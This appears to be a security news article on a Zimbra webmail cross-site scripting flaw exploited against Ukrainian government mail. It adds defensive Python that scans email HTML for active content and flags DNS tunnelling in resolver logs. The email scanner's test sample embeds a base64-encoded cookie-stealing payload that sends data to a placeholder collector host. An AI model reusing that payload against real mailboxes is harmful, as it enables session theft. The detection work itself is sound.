State-backed hackers linked to Russian military intelligence are targeting Ukrainian government entities by exploiting a vulnerability in Zimbra Collaboration Suite tracked as CVE-2025-66376. The flaw is a cross-site scripting bug in the webmail client: a crafted message causes attacker-supplied JavaScript to run inside the victim's browser session when the message is rendered, which is what gives the attacker access to the mailbox without needing to break into the server itself. The Cybersecurity and Infrastructure Security Agency added the vulnerability to its Known Exploited Vulnerabilities catalog on Wednesday, and under Binding Operational Directive 22-01 Federal Civilian Executive Branch agencies have two weeks to patch their systems.
Security researchers at Seqrite Labs reported exploitation of the Zimbra vulnerability a day before CISA's listing, describing a campaign they call Operation GhostMail against the Ukrainian State Hydrology Agency, which provides navigational and hydrographic support under the Ministry of Infrastructure. The phishing email carried no attachment and no link: the malicious content is the HTML body itself, so attachment sandboxing and URL checks at the mail gateway have nothing to inspect.
Instead, the HTML body carries an obfuscated JavaScript payload that the webmail client executes in the victim's browser session as soon as the message is opened, with no click required. The script immediately harvests credentials, session tokens and backup two-factor authentication codes, and exfiltrates mailbox contents from the previous 90 days over DNS and HTTPS.
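As an added illustration, not code from the article or from Seqrite, the following Python scans a raw RFC 822 message for the kind of active content described above: inline scripts, event-handler attributes, javascript: URIs, embedded frames, and decoder calls such as atob() or eval() wrapped around long base64 blobs. A webmail client that renders such content without sanitising it is exactly what a stored cross-site scripting bug amounts to, so this is a useful pre-delivery or hunting check regardless of which CVE is in play. The two sample messages, the addresses and the collector hostname are constructed for the example; the indicator patterns are heuristics, not a complete HTML sanitiser.

```python
import base64
import re
from email import message_from_bytes, policy
from email.message import EmailMessage

# Heuristic indicators of active content in an HTML mail body. The first four
# are active content on their own; the last two are obfuscation hints that are
# only reported, since long base64 runs also appear in benign mail.
INDICATORS = {
    "script_tag":     re.compile(r"<script\b", re.I),
    "event_handler":  re.compile(r"\son[a-z]{3,}\s*=", re.I),      # onerror=, onload=, ...
    "javascript_uri": re.compile(r"(?:href|src|action)\s*=\s*['\"]?\s*javascript:", re.I),
    "embedded_frame": re.compile(r"<(?:iframe|object|embed)\b", re.I),
    "decoder_call":   re.compile(r"\b(?:eval|atob|unescape|String\.fromCharCode)\s*\(", re.I),
    "base64_blob":    re.compile(r"[A-Za-z0-9+/]{80,}={0,2}"),
}
ACTIVE = {"script_tag", "event_handler", "javascript_uri", "embedded_frame"}


def scan_html(html: str):
    """Return (indicator, snippet) pairs for every match in one HTML body."""
    findings = []
    for name, pattern in INDICATORS.items():
        for m in pattern.finditer(html):
            start = max(0, m.start() - 20)
            findings.append((name, html[start:m.end() + 40].replace("\n", " ")))
    return findings


def scan_eml(raw: bytes):
    """Parse a raw message and scan every text/html part, decoding any
    Content-Transfer-Encoding (quoted-printable, base64) on the way."""
    msg = message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            findings.extend(scan_html(part.get_content()))
    return findings


def is_suspicious(raw: bytes) -> bool:
    """True when the message carries active content, not just a long blob."""
    return bool({name for name, _ in scan_eml(raw)} & ACTIVE)


def build_sample(html_body: str) -> bytes:
    """Construct a multipart/alternative message around the given HTML.
    Addresses are placeholders for the example."""
    msg = EmailMessage()
    msg["From"] = "sender@example.invalid"
    msg["To"] = "user@example.invalid"
    msg["Subject"] = "Quarterly hydrology report"
    msg.set_content("Please view this message in an HTML-capable client.")
    msg.add_alternative(html_body, subtype="html")
    return msg.as_bytes()


# Constructed samples. The "payload" is a harmless cookie-stealing one-liner
# pointed at a hypothetical collector host; it never runs here.
BENIGN_EML = build_sample(
    "<html><body><p>Report attached next week.</p></body></html>"
)
PAYLOAD_B64 = base64.b64encode(
    b"fetch('https://collector.example.invalid/?c='+document.cookie)"
).decode()
MALICIOUS_EML = build_sample(
    "<html><body><p>Report</p>"
    "<img src=\"x\" onerror=\"eval(atob('" + PAYLOAD_B64 + "'))\">"
    "</body></html>"
)

if __name__ == "__main__":
    for label, raw in (("benign", BENIGN_EML), ("malicious", MALICIOUS_EML)):
        print(label, "suspicious =", is_suspicious(raw))
        for name, snippet in scan_eml(raw):
            print("  ", name, "->", snippet)
```

The check is deliberately run on the decoded body of every text/html part, because the same payload can arrive as 7-bit, quoted-printable or base64-encoded text and a regex over the raw bytes would miss two of the three. Note that nothing here exercises the webmail client's own sanitiser; the point is to find the messages that are trying to get past it.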
Zimbra flaws are a recurring target for state-sponsored groups in the region. In early 2023 the Winter Vivern cyberespionage group exploited a reflected cross-site scripting bug in Zimbra to breach thousands of vulnerable email servers and read the mail of NATO-aligned organisations, including the communications of government officials and military personnel.
In October 2024, U.S. and U.K. cyber agencies warned that APT29, the group linked to Russia's Foreign Intelligence Service (SVR), was exploiting a different Zimbra vulnerability at scale to steal email account credentials from many targets. Taken together, these campaigns point to a systemic risk in the email infrastructure used by diplomatic and government bodies.
Zimbra is a widely deployed email and collaboration suite: hundreds of millions of people use it, including hundreds of government agencies, and thousands of businesses rely on it for internal communications and document management. That footprint makes any webmail flaw in it a large and attractive attack surface for advanced persistent threats.
Active exploitation against government targets makes rapid patching the priority: security teams should update affected Zimbra installations to a fixed release without waiting for the next maintenance window. Because the payload steals session tokens and backup two-factor codes, patching alone does not close the incident; accounts that opened the messages should be treated as compromised, with sessions invalidated and passwords and backup codes rotated. Continued monitoring of Zimbra deployments, including the DNS and HTTPS traffic leaving them, remains essential, since further campaigns are likely to lean on similar webmail flaws that make no noise at the mail gateway. This incident underscores the need for robust email security across allied governments.
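The exfiltration channel described earlier, mailbox data carried out over DNS, leaves a recognisable shape in resolver logs: many unique, long, high-entropy subdomains under one registered domain, often as TXT queries. The following Python, an added example rather than anything from the article, profiles query-log lines per domain and flags those that look like a tunnel. The log lines are constructed in a simplified BIND-like format, the domains are placeholders, and the thresholds are starting points to tune against your own baseline; the two-label "registered domain" split is a simplification that a real deployment would replace with a public-suffix list.

```python
import math
import re
from collections import defaultdict

# Matches the "query: <name> IN <type>" fragment of a BIND-style query log line.
QUERY_RE = re.compile(r"query: (?P<name>[\w.-]+) IN (?P<qtype>[A-Z]+)")


def shannon_entropy(s: str) -> float:
    """Bits per character; random hex tends toward 4.0, English words sit near 3."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(name: str):
    """Return (registered_domain, prefix). Assumes two-label registrable
    domains; use a public-suffix list in production."""
    labels = name.rstrip(".").lower().split(".")
    if len(labels) <= 2:
        return ".".join(labels), ""
    return ".".join(labels[-2:]), ".".join(labels[:-2])


def profile_queries(log_text: str):
    """Aggregate per registered domain: query count, unique prefixes,
    mean prefix length, mean prefix entropy and the query types seen."""
    acc = defaultdict(lambda: {"prefixes": set(), "queries": 0, "qtypes": set()})
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if not m:
            continue
        domain, prefix = split_name(m["name"])
        d = acc[domain]
        d["queries"] += 1
        d["qtypes"].add(m["qtype"])
        if prefix:
            d["prefixes"].add(prefix)
    profile = {}
    for domain, d in acc.items():
        prefixes = list(d["prefixes"])
        if prefixes:
            avg_len = sum(len(p) for p in prefixes) / len(prefixes)
            avg_ent = sum(shannon_entropy(p.replace(".", "")) for p in prefixes) / len(prefixes)
        else:
            avg_len = avg_ent = 0.0
        profile[domain] = {
            "queries": d["queries"],
            "unique_prefixes": len(prefixes),
            "avg_prefix_len": avg_len,
            "avg_entropy": avg_ent,
            "qtypes": sorted(d["qtypes"]),
        }
    return profile


def flag_tunnels(profile, min_unique=8, min_len=30, min_entropy=3.5):
    """Domains with many distinct, long, high-entropy prefixes. All three
    conditions must hold so that a CDN with a few hashed hostnames is not flagged."""
    return sorted(
        dom for dom, s in profile.items()
        if s["unique_prefixes"] >= min_unique
        and s["avg_prefix_len"] >= min_len
        and s["avg_entropy"] >= min_entropy
    )


# Constructed sample log. The "exfil" chunks are rotations of the hex alphabet
# repeated three times, so each is 48 characters with every hex digit used
# equally (entropy exactly 4.0) and the result is deterministic.
HEX = "0123456789abcdef"


def fake_chunk(i: int) -> str:
    rotated = HEX[i % 16:] + HEX[:i % 16]
    return rotated * 3


_lines = [
    f"client 10.20.0.15#51234: query: {host}.example.invalid IN A +"
    for host in ("www", "mail", "www", "cdn", "mail")
]
_lines += [
    f"client 10.20.0.15#5{1000 + i}: query: {fake_chunk(i)}.{i}.exfil-c2.invalid IN TXT +"
    for i in range(12)
]
SAMPLE_LOG = "\n".join(_lines)

if __name__ == "__main__":
    prof = profile_queries(SAMPLE_LOG)
    for dom, stats in prof.items():
        print(dom, stats)
    print("flagged:", flag_tunnels(prof))
```

Run against real logs, the domain-level profile is what you would feed a detection rule; the per-line regex only needs adjusting to the log format of the resolver in use (BIND, Unbound, a cloud DNS service), while the scoring stays the same. The HTTPS side of the exfiltration has no such structural tell and is better caught by egress allow-listing from the mail servers.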